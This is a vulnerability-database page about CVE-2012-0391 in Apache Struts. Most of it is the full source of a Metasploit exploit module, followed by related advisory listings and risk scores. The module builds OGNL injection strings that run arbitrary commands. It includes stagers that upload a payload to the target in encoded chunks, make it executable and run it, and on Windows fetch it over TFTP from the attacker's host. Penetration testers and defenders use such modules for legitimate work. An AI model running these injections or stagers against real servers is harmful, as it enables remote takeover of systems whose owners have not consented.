Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apache Struts Remote Command Execution

🗓️ 09 Jun 2012 19:53:43Reported by Johannes Dahse, Andreas Nusser, juan vazquez <[email protected]>, sinn3r <[email protected]>, mihiType 
metasploit
 metasploit🔗 www.rapid7.com👁 60 Views

Exploits remote command execution vulnerability in Apache Struts < 2.2.1.1 interpreting parameters as OGNL expressions. Allows remote attackers to execute arbitrary Java code. Supports multiple platforms.

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: Order Management could be subject to an Apache Struts vulnerability that could allow a remote attacker to execute arbitrary code on the system.
12 Apr 202417:44
ibm
IBM Security Bulletins		Security Bulletin: IBM Call Center and Apache Struts Struts upgrade strategy (various CVEs, see below)
14 Sep 202217:37
ibm
IBM Security Bulletins		Security Bulletin: IBM Sterling Order Management Apache Struts upgrade strategy (various CVEs, see below)
14 Sep 202217:45
ibm
0day.today		Apache Struts 2.2.1.1 Remote Command Execution
5 Jun 201200:00
zdt
ATTACKERKB		CVE-2012-0391
8 Jan 201200:00
attackerkb
BDU FSTEC		The vulnerability of the ExceptionDelegator component in the Apache Struts software framework allows a hacker to execute arbitrary code.
7 Sep 202100:00
bdu_fstec
Circl		CVE-2012-0391
6 Jan 201200:00
circl
CISA KEV Catalog		Apache Struts 2 Improper Input Validation Vulnerability
21 Jan 202200:00
cisa_kev
CISA		CISA Adds Four Known Exploited Vulnerabilities to Catalog
21 Jan 202200:00
cisa
Check Point Advisories		Apache Struts 2 ConversionErrorInterceptor OGNL Script Injection (CVE-2012-0391)
16 Apr 201200:00
checkpoint_advisories
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Struts Remote Command Execution',
        'Description' => %q{
          This module exploits a remote command execution vulnerability in
          Apache Struts versions < 2.2.1.1. This issue is caused because the
          ExceptionDelegator interprets parameter values as OGNL expressions
          during certain exception handling for mismatched data types of properties,
          which allows remote attackers to execute arbitrary Java code via a
          crafted parameter.
        },
        'Author' => [
          'Johannes Dahse', # Vulnerability discovery and PoC
          'Andreas Nusser', # Vulnerability discovery and PoC
          'juan vazquez', # Metasploit module
          'sinn3r', # Metasploit module
          'mihi' # ARCH_JAVA support
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2012-0391'],
          [ 'OSVDB', '78277'],
          [ 'EDB', '18329']
        ],
        'Platform' => %w{java linux win},
        'Privileged' => true,
        'Targets' => [
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win',
              'CmdStagerFlavor' => 'tftp'
            }
          ],
          [
            'Linux Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
          [
            'Java Universal',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            },
          ]
        ],
        'DisclosureDate' => '2012-01-06',
        'DefaultTarget' => 2,
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_delete_file
              stdapi_sys_config_sysinfo
            ]
          }
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
      ]
    )

    self.needs_cleanup = true
  end

  def execute_command(cmd, opts = {})
    uri = String.new(datastore['TARGETURI'])
    uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'
    uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'
    uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,CMD,'')%2b'") if target['Platform'] == 'java'
    uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))

    vprint_status("Attempting to execute: #{cmd}")

    resp = send_request_raw({
      'uri' => uri,
      'version' => '1.1',
      'method' => 'GET',
    }, 5)
  end

  def windows_stager
    exe_fname = rand_text_alphanumeric(4 + rand(4)) + ".exe"

    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    execute_cmdstager({ temp: '.', tftphost: tftphost })
    @payload_exe = generate_payload_exe

    print_status("Attempting to execute the payload...")
    execute_command(@payload_exe)
  end

  def linux_stager
    cmds = "/bin/sh@-c@echo LINE | tee FILE"
    exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    base64 = Rex::Text.encode_base64(exe)
    base64.gsub!(/\=/, "\\u003d")
    file = rand_text_alphanumeric(4 + rand(4))

    execute_command("/bin/sh@-c@touch /tmp/#{file}.b64")
    cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
    base64.each_line do |line|
      line.chomp!
      cmd = cmds
      cmd.gsub!(/LINE/, line)
      execute_command(cmds)
    end

    execute_command("/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
    execute_command("/bin/sh@-c@chmod +x /tmp/#{file}")
    execute_command("/bin/sh@-c@rm /tmp/#{file}.b64")

    execute_command("/bin/sh@-c@/tmp/#{file}")
    @payload_exe = "/tmp/" + file
  end

  def java_upload_part(part, filename, append = 'false')
    cmd = ""
    cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
    cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
    cmd << "#f.close()"
    execute_command(cmd)
  end

  def java_stager
    @payload_exe = rand_text_alphanumeric(4 + rand(4)) + ".jar"
    append = 'false'
    jar = payload.encoded_jar.pack

    chunk_length = 384 # 512 bytes when base64 encoded

    while (jar.length > chunk_length)
      java_upload_part(jar[0, chunk_length], @payload_exe, append)
      jar = jar[chunk_length, jar.length - chunk_length]
      append = 'true'
    end
    java_upload_part(jar, @payload_exe, append)

    cmd = ""
    # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
    cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
    cmd << "#q.setAccessible(true),#q.set(null,true),"
    cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
    cmd << "#q.setAccessible(true),#q.set(null,false),"
    # create classloader
    cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
    # load class
    cmd << "#c=#cl.loadClass('metasploit.Payload'),"
    # invoke main method
    cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
    cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
    execute_command(cmd)
  end

  def on_new_session(client)
    if client.type != "meterpreter"
      print_error("Please use a meterpreter payload in order to automatically cleanup.")
      print_error("The #{@payload_exe} file must be removed manually.")
      return
    end

    client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")

    if client.sys.config.sysinfo["OS"] =~ /Windows/
      print_error("Windows does not allow running executables to be deleted")
      print_error("The #{@payload_exe} file must be removed manually after migrating")
      return
    end

    print_warning("Deleting the #{@payload_exe} file")
    client.fs.file.rm(@payload_exe)
  end

  def exploit
    unless datastore['CMD'].blank?
      print_status("Executing user supplied command")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
    when 'linux'
      linux_stager
    when 'win'
      windows_stager
    when 'java'
      java_stager
    else
      fail_with(Failure::NoTarget, 'Unsupported target platform!')
    end

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jun 2022 09:10Current
7.8High risk
Vulners AI Score7.8
CVSS 29.3
CVSS 3.19.8
EPSS0.75071
apache strutsremote command executionognl expressionsjavalinuxwindowscve-2012-0391osvdb-78277edb-18329metasploitmeterpreter
60